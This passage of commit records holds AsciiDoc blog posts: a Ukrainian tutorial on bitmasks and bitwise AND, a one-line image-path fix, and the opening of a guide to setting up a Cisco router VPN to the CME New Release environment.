\u0432\u0438\u0440\u0456\u0448\u0438\u043b\u0438 \u0441\u043a\u043e\u0440\u0438\u0441\u0442\u0430\u0442\u0438\u0441\u044c bitmask \u0443 \u0441\u0432\u043e\u0454\u043c\u0443 \u043f\u0440\u043e\u0435\u043a\u0442\u0456.\n\nicon:heart-o[size=2x]","old_contents":"= 1+1 = 10. Bitmask usage\n:hp-image: cover_lines.jpg\n:hp-tags: bitmask\n\n\u0426\u0456\u043a\u0430\u0432\u043e, \u043d\u0430\u0441\u043a\u0456\u043b\u044c\u043a\u0438 \u0440\u043e\u0437\u043f\u043e\u0432\u0441\u044e\u0434\u0436\u0435\u043d\u0435 \u0437\u0430\u0440\u0430\u0437, \u0432 \u0447\u0430\u0441 \"\u043f\u0430\u043d\u0443\u0432\u0430\u043d\u043d\u044f\" \u0432\u0438\u0441\u043e\u043a\u043e\u0440\u0456\u0432\u043d\u0435\u0432\u0438\u0445 \u043c\u043e\u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u0443\u0432\u0430\u043d\u043d\u044f \u0442\u0430 \u0432\u0435\u043b\u0438\u043a\u0438\u0445 \u043e\u0431\"\u0454\u043c\u0456\u0432 \u043f\u0430\u043c\"\u044f\u0442\u0456, \u0432\u0438\u043a\u043e\u0440\u0438\u0441\u0442\u0430\u043d\u043d\u044f \u043f\u043e\u0431\u0456\u0442\u043e\u0432\u0438\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0456\u0439 (bitwise) \u0442\u0430 \u0431\u0456\u0442\u043e\u0432\u0438\u0445 \u043c\u0430\u0441\u043e\u043a (bitmask)? \u041c\u0435\u043d\u0456 \u0447\u043e\u043c\u0443\u0441\u044c \u0437\u0434\u0430\u0432\u0430\u043b\u043e\u0441\u044c, \u0449\u043e \u0434\u0432\u0456\u0439\u043a\u043e\u0432\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0441\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044f \u043c\u043e\u0436\u0435 \u0431\u0443\u0442\u0438 \u043a\u043e\u0440\u0438\u0441\u043d\u043e\u044e \u0434\u043b\u044f \u0442\u0438\u0445, \u0445\u0442\u043e \u0437\u0430\u0439\u043c\u0430\u0454\u0442\u044c\u0441\u044f \u043d\u0438\u0437\u044c\u043a\u043e-\u0440\u0456\u0432\u043d\u0435\u0432\u0438\u043c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u0443\u0432\u0430\u043d\u043d\u044f\u043c (\u043d\u0456\u043a\u043e\u043b\u0438 \u043d\u0435 \u0437\u0443\u0441\u0442\u0440\u0456\u0447\u0430\u043b\u0430 \u0442\u0430\u043a\u0438\u0445 \u043b\u044e\u0434\u0435\u0439, \u0430\u043b\u0435 \u0441\u043f\u043e\u0434\u0456\u0432\u0430\u044e\u0441\u044c, \u0449\u043e \u0432\u043e\u043d\u0438 \u0456\u0441\u043d\u0443\u044e\u0442\u044c), \u043d\u0443 \u0430\u0431\u043e \u0434\u043b\u044f \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044f \u044f\u043a\u043e\u0433\u043e\u0441\u044c \u0445\u0438\u0442\u0440\u043e\u0433\u043e \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0437\u0431\u0435\u0440\u0456\u0433\u0430\u044e\u0447\u043e\u0433\u043e \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c\u0443 (\u043b\u044e\u0434\u0435\u0439, \u0449\u043e \u0437\u0430\u0439\u043c\u0430\u044e\u0442\u044c\u0441\u044f \u0442\u0430\u043a\u0438\u043c\u0438 \u0440\u0435\u0447\u0430\u043c\u0438 \u0434\u043b\u044f \u0440\u043e\u0431\u043e\u0442\u0438, \u0430 \u043d\u0435 \u0434\u043b\u044f \u0445\u043e\u0431\u0456, \u044f \u0442\u0435\u0436, \u043d\u0430\u0436\u0430\u043b\u044c, \u043d\u0435 \u0437\u0443\u0441\u0442\u0440\u0456\u0447\u0430\u043b\u0430). \u042f\u043a\u0438\u043c \u0436\u0435 \u0431\u0443\u043b\u043e \u043c\u043e\u0454 \u0437\u0434\u0438\u0432\u0443\u0432\u0430\u043d\u043d\u044f, \u043a\u043e\u043b\u0438 \u043d\u0430 \u043e\u0434\u043d\u043e\u043c\u0443 \u043f\u0440\u043e\u0435\u043a\u0442\u0456 \u044f \u043f\u043e\u0431\u0430\u0447\u0438\u043b\u0430 \u0432 \u043a\u043e\u0434\u0456 \u043e\u043f\u0435\u0440\u0430\u0446\u0456\u044e \u043d\u0430 \u0437\u0440\u0430\u0437\u043e\u043a \u043d\u0430\u0441\u0442\u0443\u043f\u043d\u043e\u0457: +\n\n\tif (Request.PermissionMask & (8) > 0)\n\t\t{...}\n\n\u041d\u0435\u0432\u0436\u0435! \u041d\u0435\u0432\u0436\u0435 \u0448\u043a\u0456\u043b\u044c\u043d\u0456 \u0437\u043d\u0430\u043d\u043d\u044f \u0437 \u0434\u0432\u0456\u0439\u043a\u043e\u0432\u043e\u0457 \u0441\u0438\u0441\u0442\u0435\u043c\u0438 \u0441\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044f \u0441\u0442\u0430\u043d\u0443\u0442\u044c \u0432 \u043d\u0430\u0433\u043e\u0434\u0456 \u0434\u043b\u044f \u0440\u043e\u0431\u043e\u0442\u0438! \u042f\u043a \u0432\u0438\u044f\u0432\u0438\u0442\u044c\u0441\u044f \u043f\u0456\u0437\u043d\u0456\u0448\u0435, \u043d\u0430 \u0434\u0432\u043e\u0445 \u043c\u043e\u0457\u0445 \u043c\u0438\u043d\u0443\u043b\u0438\u0445 \u0437\u0432\u0438\u0447\u0430\u0439\u043d\u0456\u0441\u0456\u043d\u044c\u043a\u0438\u0445 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u0438\u0445 \u043f\u0440\u043e\u0435\u043a\u0442\u0430\u0445 \u0432\u0438\u043a\u043e\u0440\u0438\u0441\u0442\u043e\u0432\u0443\u0432\u0430\u043b\u0438\u0441\u044c \u0431\u0456\u0442\u043e\u0432\u0456 \u043c\u0430\u0441\u043a\u0438. \u041e\u0434\u043d\u0438\u043c \u0437 \u043d\u0438\u0445 \u0431\u0443\u043b\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u0430 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u0430 \u0440\u043e\u043a\u0456\u0432 \u0442\u0430\u043a 15 \u043d\u0430\u0437\u0430\u0434 (\u043d\u0443 \u0442\u0443\u0442 \u043c\u043e\u0436\u043d\u0430 \u0437\u0440\u043e\u0437\u0443\u043c\u0456\u0442\u0438, \u043c\u043e\u0436\u0435 \u043d\u0430 \u0447\u0430\u0441 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044f \u043d\u0435 \u0431\u0443\u043b\u043e \u0456\u043d\u0448\u0438\u0445 \u0432\u0430\u0440\u0456\u0430\u043d\u0442\u0456\u0432 \u043f\u0440\u043e\u0441\u0442\u043e \u0456 \u0442\u0430\u043c \u043d\u0456\u0445\u0442\u043e \u043d\u0435 \u0434\u0443\u043c\u0430\u0432 \u043f\u0440\u043e \u0442\u0435, \u0449\u043e \u043a\u043e\u0434 \u043c\u0430\u0454 \u0431\u0443\u0442\u0438 \u0437\u0440\u043e\u0437\u0443\u043c\u0456\u043b\u0438\u043c \u0456 self-descriptive), \u0430\u043b\u0435 \u0456\u043d\u0448\u0438\u0439 \u043f\u0440\u043e\u0435\u043a\u0442 \u0431\u0443\u0432 \u0432\u0456\u0434\u043d\u043e\u0441\u043d\u043e \u043d\u043e\u0432\u0438\u043c. \u041d\u0456 \u0432 \u0442\u043e\u043c\u0443, \u043d\u0456 \u0432 \u0456\u043d\u0448\u043e\u043c\u0443 \u0432\u0438\u043f\u0430\u0434\u043a\u0443 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0438 \u0435\u043a\u043e\u043d\u043e\u043c\u0456\u0457 \u043f\u0430\u043c\"\u044f\u0442\u0456 \u0442\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0438 \u043e\u0431\u0440\u043e\u0431\u043a\u0438 \u0432\u0435\u043b\u0438\u043a\u0438\u0445 \u043e\u0431\"\u0454\u043c\u0456\u0432 \u0434\u0430\u043d\u0438\u0445 \u043d\u0435 \u0431\u0443\u043b\u043e. \n\n== Bitmask\n\n\u0421\u043f\u0440\u043e\u0431\u0443\u044e \u043f\u043e\u044f\u0441\u043d\u0438\u0442\u0438 \u0441\u0432\u043e\u0454 \u0437\u0434\u0438\u0432\u0443\u0432\u0430\u043d\u043d\u044f. \u0421\u043f\u043e\u0447\u0430\u0442\u043a\u0443 \u0440\u043e\u0437\u043f\u043e\u0432\u0456\u043c, \u0449\u043e \u0442\u0430\u043a\u0435 \u0431\u0456\u0442\u043e\u0432\u0430 \u043c\u0430\u0441\u043a\u0430. Bitmask - \u0446\u0435 \u0441\u043f\u043e\u0441\u0456\u0431 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0438 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u0438\u0441\u0442\u0438\u043a\u0438 \u043e\u0431\"\u0454\u043a\u0442\u0443 \u0437\u0430 \u0434\u043e\u043f\u043e\u043c\u043e\u0433\u043e\u044e \u0446\u0438\u0444\u0440 0 \u0442\u0430 1 (\u043d\u0443, \u0442\u043e\u043c\u0443 \u0449\u043e \u0446\u0435 *\u0431\u0456\u0442\u043e\u0432\u0430* \u043c\u0430\u0441\u043a\u0430). \u041c\u043e\u0436\u043d\u0430 \u0434\u0443\u043c\u0430\u0442\u0438 \u043f\u0440\u043e \u0431\u0456\u0442\u043e\u0432\u0443 \u043c\u0430\u0441\u043a\u0443 \u044f\u043a \u043f\u0440\u043e \u0448\u0438\u0444\u0440: +\n\n- \u041a\u043e\u0436\u043d\u0430 \u0446\u0438\u0444\u0440\u0430 \u0432 \u0447\u0438\u0441\u043b\u0456 \u0432\u0456\u0434\u043f\u043e\u0432\u0456\u0434\u0430\u0454 \u0437\u0430 \u0437\u0430\u0437\u0434\u0430\u043b\u0435\u0433\u0456\u0434\u044c \u0432\u0438\u0437\u043d\u0430\u0447\u0435\u043d\u0443 \u0432\u043b\u0430\u0441\u0442\u0438\u0432\u0456\u0441\u0442\u044c; \n- 0 \u043c\u043e\u0436\u0435 \u0437\u043d\u0430\u0447\u0438\u0442\u0438, \u043d\u0430\u043f\u0440\u0438\u043a\u043b\u0430\u0434, \u0449\u043e \u043f\u0435\u0432\u043d\u0430 \u0432\u043b\u0430\u0441\u0442\u0438\u0432\u0456\u0441\u0442\u044c \u0432 \u043e\u0431\"\u0454\u043a\u0442\u0456 \u0432\u0456\u0434\u0441\u0443\u0442\u043d\u044f, \u0430 1 - \u0449\u043e \u043f\u0440\u0438\u0441\u0443\u0442\u043d\u044f.\n\n\u0414\u043b\u044f \u043a\u0440\u0430\u0449\u043e\u0433\u043e \u0440\u043e\u0437\u0443\u043c\u0456\u043d\u043d\u044f, \u0441\u0442\u0432\u043e\u0440\u0438\u043c\u043e \u0431\u0456\u0442\u043e\u0432\u0456 \u043c\u0430\u0441\u043a\u0438 \u0434\u043b\u044f \u043a\u043e\u043b\u044c\u043e\u0440\u0456\u0432. \u0404 \u0442\u0440\u0438 \u0431\u0430\u0437\u043e\u0432\u0438\u0445 \u043a\u043e\u043b\u044c\u043e\u0440\u0438 - \u0447\u0435\u0440\u0432\u043e\u043d\u0438\u0439, \u0436\u043e\u0432\u0442\u0438\u0439 \u0442\u0430 \u0441\u0438\u043d\u0456\u0439. \u0417\u043c\u0456\u0448\u0443\u044e\u0447\u0438 \u0446\u0456 \u043a\u043e\u043b\u044c\u043e\u0440\u0438 \u043c\u0438 \u043c\u043e\u0436\u0435\u043c\u043e \u043e\u0442\u0440\u0438\u043c\u0430\u0442\u0438 \u0432\u0441\u0456 \u0456\u043d\u0448\u0456 (\u044f \u0442\u0443\u0442 \u043c\u0430\u044e \u043d\u0430 \u0443\u0432\u0430\u0437\u0456 \u0431\u0430\u0437\u043e\u0432\u0456 \u043a\u043e\u043b\u044c\u043e\u0440\u0438 \u0434\u043b\u044f \u0445\u0443\u0434\u043e\u0436\u043d\u0438\u043a\u0456\u0432, \u0436\u0438\u0432\u0438\u0445 \u043b\u044e\u0434\u0435\u0439, \u0430 \u043d\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044f \u043a\u043e\u043b\u044c\u043e\u0440\u0443 \u0432 \u043a\u043e\u043c\u043f\"\u044e\u0442\u0435\u0440\u0430\u0445). \n\n|===\n|\u0427\u0435\u0440\u0432\u043e\u043d\u0438\u0439|\u0416\u043e\u0432\u0442\u0438\u0439|\u0421\u0438\u043d\u0456\u0439| \n|0|0|1| \u0421\u0438\u043d\u0456\u0439\n|0|1|0| \u0416\u043e\u0432\u0442\u0438\u0439\n|1|0|0| \u0427\u0435\u0440\u0432\u043e\u043d\u0438\u0439\n|0|1|1| \u0417\u0435\u043b\u0435\u043d\u0438\u0439\n|1|1|0| \u041f\u043e\u043c\u0430\u0440\u0430\u043d\u0447\u0435\u0432\u0438\u0439\n|1|0|1| \u0424\u0456\u043e\u043b\u0435\u0442\u043e\u0432\u0438\u0439\n|===\n\n\n\u041e\u0442\u0440\u0438\u043c\u0430\u043b\u0438 \u0442\u0430\u043a\u0456 \u0434\u0432\u0456\u0439\u043a\u043e\u0432\u0456 \u043a\u043e\u0434\u0438: +\n\n\t1 - \u0441\u0438\u043d\u0456\u0439\n 10 - \u0436\u043e\u0432\u0442\u0438\u0439\n 100 - \u0447\u0435\u0440\u0432\u043e\u043d\u0438\u0439\n 11 - \u0437\u0435\u043b\u0435\u043d\u0438\u0439\n 110 - \u043f\u043e\u043c\u0430\u0440\u0430\u043d\u0447\u0435\u0432\u0438\u0439\n 101 - \u0444\u0456\u043e\u043b\u0435\u0442\u043e\u0432\u0438\u0439\n\n\u0417\u0430\u0437\u0432\u0438\u0447\u0430\u0439, \u044f\u043a\u0449\u043e \u0432\u0438\u0440\u0456\u0448\u0443\u044e\u0442\u044c \u043a\u043e\u0440\u0438\u0441\u0442\u0443\u0432\u0430\u0442\u0438\u0441\u044c \u0431\u0456\u0442\u043e\u0432\u0438\u043c\u0438 \u043c\u0430\u0441\u043a\u0430\u043c\u0438, \u0442\u043e \u0442\u0430\u043a\u0456 \u0434\u0432\u0456\u0439\u043a\u043e\u0432\u0456 \u043a\u043e\u0434\u0438 \u043f\u0435\u0440\u0435\u0432\u043e\u0434\u044f\u0442\u044c \u0432 \u0437\u0432\u0438\u0447\u043d\u0443 \u0434\u043b\u044f \u043d\u0430\u0441 \u0434\u0435\u0441\u044f\u0442\u043a\u043e\u0432\u0443 \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0441\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044f:\n\n\n|===\n||2|1|0|\n|\u0441\u0438\u043d\u0456\u0439|0|0|1|1 * 2^0^ = 1\n|\u0436\u043e\u0432\u0442\u0438\u0439|0|1|0| 1 * 2^1^ = 2\n|\u0447\u0435\u0440\u0432\u043e\u043d\u0438\u0439|1|0|0| 1 * 2^2^ = 4\n|\u0437\u0435\u043b\u0435\u043d\u0438\u0439|0|1|1| 1 * 2^0^ + 1 * 2^1^ = 3\n|\u043f\u043e\u043c\u0430\u0440\u0430\u043d\u0447\u0435\u0432\u0438\u0439|1|1|0| 1 * 2^1^ + 1 * 2^2^ = 6\n|\u0444\u0456\u043e\u043b\u0435\u0442\u043e\u0432\u0438\u0439|1|0|1| 1 * 2^0^ + 1 * 2^2^ = 5\n|===\n\n\u0422\u0435\u043f\u0435\u0440, \u043a\u043e\u0434\u0438 \u0434\u043e \u043d\u0430\u0448\u0438\u0445 \u043a\u043e\u043b\u044c\u043e\u0440\u0456\u0432 \u0432\u0438\u0433\u043b\u044f\u0434\u0430\u044e\u0442\u044c \u0442\u0430\u043a:\n\n\t1 - \u0441\u0438\u043d\u0456\u0439\n 2 - \u0436\u043e\u0432\u0442\u0438\u0439\n 4 - \u0447\u0435\u0440\u0432\u043e\u043d\u0438\u0439\n 3 - \u0437\u0435\u043b\u0435\u043d\u0438\u0439\n 6 - \u043f\u043e\u043c\u0430\u0440\u0430\u043d\u0447\u0435\u0432\u0438\u0439\n 5 - \u0444\u0456\u043e\u043b\u0435\u0442\u043e\u0432\u0438\u0439\n\n\u042f\u043a\u0449\u043e \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0456\u0437\u0443\u0432\u0430\u0442\u0438, \u0442\u043e \u043f\u043e\u0431\u0430\u0447\u0438\u043c\u043e, \u0449\u043e \u0432\u0441\u0456 \u0431\u0430\u0437\u043e\u0432\u0456 \u043a\u043e\u043b\u044c\u043e\u0440\u0438 \u0454 \u0441\u0442\u0435\u043f\u0435\u043d\u044f\u043c\u0438 2, \u0432\u0441\u0456 \u0456\u043d\u0448\u0456 \u043a\u043e\u043b\u044c\u043e\u0440\u0438, \u0449\u043e \u043c\u0438 \u043e\u0442\u0440\u0438\u043c\u0430\u043b\u0438 \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0456 \u0437\u043c\u0456\u0448\u0443\u0432\u0430\u043d\u043d\u044f \u0454 \u0441\u0443\u043c\u043e\u044e \u0432\u0456\u0434\u043f\u043e\u0432\u0456\u0434\u043d\u0438\u0445 \u0431\u0430\u0437\u043e\u0432\u0438\u0445 \u043a\u043e\u043b\u044c\u043e\u0440\u0456\u0432, \u0442\u0430\u043a \u0444\u0456\u043e\u043b\u0435\u0442\u043e\u0432\u0438\u0439 = \u0441\u0438\u043d\u0456\u0439 + \u0447\u0435\u0440\u0432\u043e\u043d\u0438\u0439: +\n\n\t5 = 1 + 4 \n\n\u041e\u043a\u0440\u0456\u043c \u0446\u0438\u0445 \u0432\u043b\u0430\u0441\u0442\u0438\u0432\u043e\u0441\u0442\u0435\u0439, \u0449\u0435 \u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u0430\u0445, \u0442\u0430\u043a\u0456 \"\u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0456\" \u043e\u0431\"\u0454\u043a\u0442\u0438 \u0440\u043e\u0437\u0448\u0438\u0444\u0440\u043e\u0432\u0443\u044e\u0442\u044c\u0441\u044f \u0431\u0456\u0442\u043e\u0432\u0438\u043c\u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0456\u044f\u043c\u0438 (bitwise), \u0432 \u043e\u0441\u043d\u043e\u0432\u043d\u043e\u043c\u0443 \u043e\u043f\u0435\u0440\u0430\u043d\u0434\u043e\u043c & (AND). \u0422\u0430\u043a, \u043d\u0430\u043f\u0440\u0438\u043a\u043b\u0430\u0434, \u044f\u043a\u0449\u043e \u043d\u0430\u043c \u043f\u043e\u0442\u0440\u0456\u0431\u043d\u043e \u0432\u0438\u0431\u0440\u0430\u0442\u0438 \u0441\u0435\u0440\u0435\u0434 \u0432\u0441\u0456\u0454\u0457 \u043c\u043d\u043e\u0436\u0438\u043d\u0438 \u043d\u0430\u0448\u0438\u0445 \u043a\u043e\u043b\u044c\u043e\u0440\u0456\u0432 \u0442\u0456\u043b\u044c\u043a\u0438 \u0442\u0456 \u043a\u043e\u043b\u044c\u043e\u0440\u0438, \u0434\u0435 \u0431\u0443\u0432 \u0437\u0430\u0441\u0442\u043e\u0441\u043e\u0432\u0430\u043d\u0438\u0439 \u0441\u0438\u043d\u0456\u0439 \u043a\u043e\u043b\u0456\u0440, \u0442\u043e \u043c\u0438 \u0432\u0438\u043a\u043e\u043d\u0430\u0454\u043c\u043e \u0442\u0430\u043a\u0443 \u043e\u043f\u0435\u0440\u0430\u0446\u0456\u044e:\n\n\tcolor = {1, 2, 4, 3, 6, 5} - \u043d\u0430\u0448\u0430 \u043c\u043d\u043e\u0436\u0438\u043d\u0430 \u0432\u0441\u0456\u0445 \u043a\u043e\u043b\u044c\u043e\u0440\u0456\u0432\n\tcolor & 1 = {1, 3, 5} - \u043c\u043d\u043e\u0436\u0438\u043d\u0430 \u043a\u043e\u043b\u044c\u043e\u0440\u0456\u0432, \u0432 \u044f\u043a\u0438\u0445 \u0454 \u0441\u0438\u043d\u0456\u0439 \u043a\u043e\u043b\u0456\u0440 (\u0441\u0438\u043d\u0456\u0439, \u0437\u0435\u043b\u0435\u043d\u0438\u0439, \u0444\u0456\u043e\u043b\u0435\u0442\u043e\u0432\u0438\u0439)\n \n\u041e\u043f\u0438\u0448\u0443 \u0434\u0435\u0442\u0430\u043b\u044c\u043d\u0456\u0448\u0435, \u044f\u043a \u043c\u0438 \u0446\u0435 \u043e\u0442\u0440\u0438\u043c\u0430\u043b\u0438:\n\n\u041c\u0438 \u0437\u0430\u0441\u0442\u043e\u0441\u043e\u0432\u0443\u0454\u043c\u043e \u043b\u043e\u0433\u0456\u0447\u043d\u0435 AND \u0434\u043e \u043a\u043e\u0436\u043d\u043e\u0457 \u043f\u0430\u0440\u0438 \u0431\u0456\u0442\u0456\u0432, \u044f\u043a\u0456 \u0441\u0442\u043e\u044f\u0442\u044c \u043d\u0430 \u043e\u0434\u043d\u0430\u043a\u043e\u0432\u0438\u0445 \u043f\u043e\u0437\u0438\u0446\u0456\u044f\u0445 \u0443 \u0434\u0432\u0456\u0439\u043a\u043e\u0432\u0438\u0445 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044f\u0445 \u043a\u043e\u043b\u044c\u043e\u0440\u0456\u0432. \u042f\u043a\u0449\u043e \u043e\u0431\u0438\u0434\u0432\u0430 \u0432\u0456\u0434\u043f\u043e\u0432\u0456\u0434\u043d\u0438\u0445 \u0431\u0456\u0442\u0430 \u0440\u0456\u0432\u043d\u0456 1, \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0443\u044e\u0447\u0438\u0439 \u0434\u0432\u0456\u0439\u043a\u043e\u0432\u0438\u0439 \u0440\u043e\u0437\u0440\u044f\u0434 \u0434\u043e\u0440\u0456\u0432\u043d\u044e\u0454 1 (true), \u044f\u043a\u0449\u043e \u0436 \u0445\u043e\u0447\u0430 \u0431 \u043e\u0434\u0438\u043d \u0431\u0456\u0442 \u0437 \u043f\u0430\u0440\u0438 \u0434\u043e\u0440\u0456\u0432\u043d\u044e\u0454 0, \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0443\u044e\u0447\u0438\u0439 \u0434\u0432\u0456\u0439\u043a\u043e\u0432\u0438\u0439 \u0440\u043e\u0437\u0440\u044f\u0434 \u0434\u043e\u0440\u0456\u0432\u043d\u044e\u0454 0 (false).\n\n|=== \n|0|0|#1#| \u0421\u0438\u043d\u0456\u0439\n|0|1|0| \u0416\u043e\u0432\u0442\u0438\u0439\n|1|0|0| \u0427\u0435\u0440\u0432\u043e\u043d\u0438\u0439\n|0|1|#1#| \u0417\u0435\u043b\u0435\u043d\u0438\u0439\n|1|1|0| \u041f\u043e\u043c\u0430\u0440\u0430\u043d\u0447\u0435\u0432\u0438\u0439\n|1|0|#1#| \u0424\u0456\u043e\u043b\u0435\u0442\u043e\u0432\u0438\u0439\n|===\n***\n|===\n|0|0|#1#| \u0421\u0438\u043d\u0456\u0439\n|===\n***\n|=== \n|0|0|*1*| \u0421\u0438\u043d\u0456\u0439\n|[line-through]*0*|[line-through]*0*|[line-through]*0*| [line-through]*\u0416\u043e\u0432\u0442\u0438\u0439*\n|[line-through]*0*|[line-through]*0*|[line-through]*0*| [line-through]*\u0427\u0435\u0440\u0432\u043e\u043d\u0438\u0439*\n|0|0|*1*| \u0417\u0435\u043b\u0435\u043d\u0438\u0439\n|[line-through]*0*|[line-through]*0*|[line-through]*0*| [line-through]*\u041f\u043e\u043c\u0430\u0440\u0430\u043d\u0447\u0435\u0432\u0438\u0439*\n|0|0|*1*| \u0424\u0456\u043e\u043b\u0435\u0442\u043e\u0432\u0438\u0439\n|===\n\n\n\u042f\u043a \u0431\u0430\u0447\u0438\u0442\u0435, \u0437\u0430\u0441\u0442\u043e\u0441\u0443\u0432\u0430\u043d\u043d\u044f \u0431\u0456\u0442\u043e\u0432\u0438\u0445 \u043c\u0430\u0441\u043e\u043a \u0454 \u0446\u0456\u043a\u0430\u0432\u0438\u043c \u0442\u0430 \u0434\u0430\u0454 \u043d\u0430\u043c \u043c\u043e\u0436\u043b\u0438\u0432\u0456\u0441\u0442\u044c \u0432 \u043e\u0434\u043d\u043e\u043c\u0443 \u0447\u0438\u0441\u043b\u0456 \u0437\u0431\u0435\u0440\u0456\u0433\u0430\u0442\u0438 \u0431\u0430\u0433\u0430\u0442\u043e \u0456\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0456\u0457 - \u043f\u043e \u043e\u0434\u043d\u043e\u043c\u0443 \u0431\u0456\u0442\u0443 \u043d\u0430 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u0438\u0441\u0442\u0438\u043a\u0443 \u043e\u0431\"\u0454\u043a\u0442\u0430. \u0410\u043b\u0435, \u0446\u0435 \u043d\u0435 \u0440\u043e\u0431\u0438\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u0443 \u043b\u0435\u0433\u043a\u043e\u044e \u0434\u043b\u044f \u0440\u043e\u0437\u0443\u043c\u0456\u043d\u043d\u044f \u0442\u0430 \u043f\u043e\u0434\u0430\u043b\u044c\u0448\u043e\u0457 \u043f\u0456\u0434\u0442\u0440\u0438\u043c\u043a\u0438, \u043e\u0441\u043e\u0431\u043b\u0438\u0432\u043e, \u044f\u043a\u0449\u043e \u0440\u043e\u0437\u0440\u043e\u0431\u043d\u0438\u043a \u043d\u0435 \u0437\u0430\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0443\u0432\u0430\u0432 \u0441\u0432\u0456\u0439 \u0448\u0438\u0444\u0440 =) \n\n\u041d\u0430 \u0441\u044c\u043e\u0433\u043e\u0434\u043d\u0456 \u0432\u0441\u0435, \u0430 \u0432 \u043d\u0430\u0441\u0442\u0443\u043f\u043d\u043e\u043c\u0443 \u043f\u043e\u0441\u0442\u0456 \u044f \u0440\u043e\u0437\u043f\u043e\u0432\u0456\u043c \u043f\u0440\u043e \u0442\u0435, \u044f\u043a \u043c\u043e\u0436\u043d\u0430 \u0443\u0434\u043e\u0441\u043a\u043e\u043d\u0430\u043b\u0438\u0442\u0438 \u0440\u0456\u0448\u0435\u043d\u043d\u044f, \u044f\u043a\u0449\u043e \u0432\u0438, \u0432\u0441\u0435 \u0436 \u0442\u0430\u043a\u0438, \u0432\u0438\u0440\u0456\u0448\u0438\u043b\u0438 \u0441\u043a\u043e\u0440\u0438\u0441\u0442\u0430\u0442\u0438\u0441\u044c bitmask \u0443 \u0441\u0432\u043e\u0454\u043c\u0443 \u043f\u0440\u043e\u0435\u043a\u0442\u0456.\n\nicon:heart-o[size=2x]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"947aa5ed6cec821800bc568dde5671a92853e464","subject":"Update 2016-03-12-Follow-Your-Madness.adoc","message":"Update 2016-03-12-Follow-Your-Madness.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2016-03-12-Follow-Your-Madness.adoc","new_file":"_posts\/2016-03-12-Follow-Your-Madness.adoc","new_contents":"= Follow Your Madness\n:hp-tags: Self Improvement, Soft Skills, Confidence\n:hp-image: covers\/cover-01.jpg\n","old_contents":"= Follow Your Madness\n:hp-tags: Self Improvement, Soft Skills, Confidence\n:hp-image: \/covers\/cover-01.jpg\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"48aa65b1ad8ef976fcf79aadebe060f9c4e7cc7c","subject":"Update 2016-09-03-CME-New-Release-VPN.adoc","message":"Update 2016-09-03-CME-New-Release-VPN.adoc","repos":"mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io,mattpearson\/mattpearson.github.io","old_file":"_posts\/2016-09-03-CME-New-Release-VPN.adoc","new_file":"_posts\/2016-09-03-CME-New-Release-VPN.adoc","new_contents":"= CME New Release VPN\n\nThis guide is written to help others go through the process of configuring a system to connect to the Chicago Mercantile Exchange's New Release environment over a self-hosted VPN connection. It's meant not to be an in-depth explanation of all terms and concepts, but rather a guide\/map to go from a new router to having a working connection.\n\n== Step 1: Router\n\nYou will need a router with built-in ISAKMP and IPSEC capabilities. One of the low cost options is to go with an 800 series Cisco router such as the 871W which you can pick up on Ebay for $50 to $60 and it includes wireless capabilities.\n\nFor those readers who are not networking experts or Cisco CCNAs, there are many acronyms that are used. A few of them are briefly explained here.\n* ISAKMP - This is part of the security mechanism and is a subset of IKE. http:\/\/networkengineering.stackexchange.com\/questions\/1\/whats-the-difference-between-ike-and-isakmp\n* GRE - Generic Routing Encapsulation. This allows multicast traffic to be sent over the VPN tunnel. http:\/\/www.cisco.com\/c\/en\/us\/support\/docs\/ip\/ip-multicast\/43584-mcast-over-gre.html\n* PIM - Protocol Independent Multicast. You'll need to \"enable multicast routing\" and \"pim sparse-mode\" on the router for the multicast traffic. http:\/\/www.cisco.com\/c\/en\/us\/td\/docs\/ios\/solutions_docs\/ip_multicast\/White_papers\/mcst_ovr.html\n* VLAN - Virtual LAN. Note that on the 871W, you can not assign a specific IP or DHCP group to the physical interfaces. You must assign the interfaces to be part of a VLAN and then the VLAN can be assigned a DHCP pool for IP assignment. \n* Advanced Security or Advanced IP - Cisco offers two flavors of software to run on their routers. The \"PIM\" capabilities are in the Advanced IP package, not the Advanced Security package despite the need for a VPN tunnel! Make sure you are running a package with the K9 designator because it has 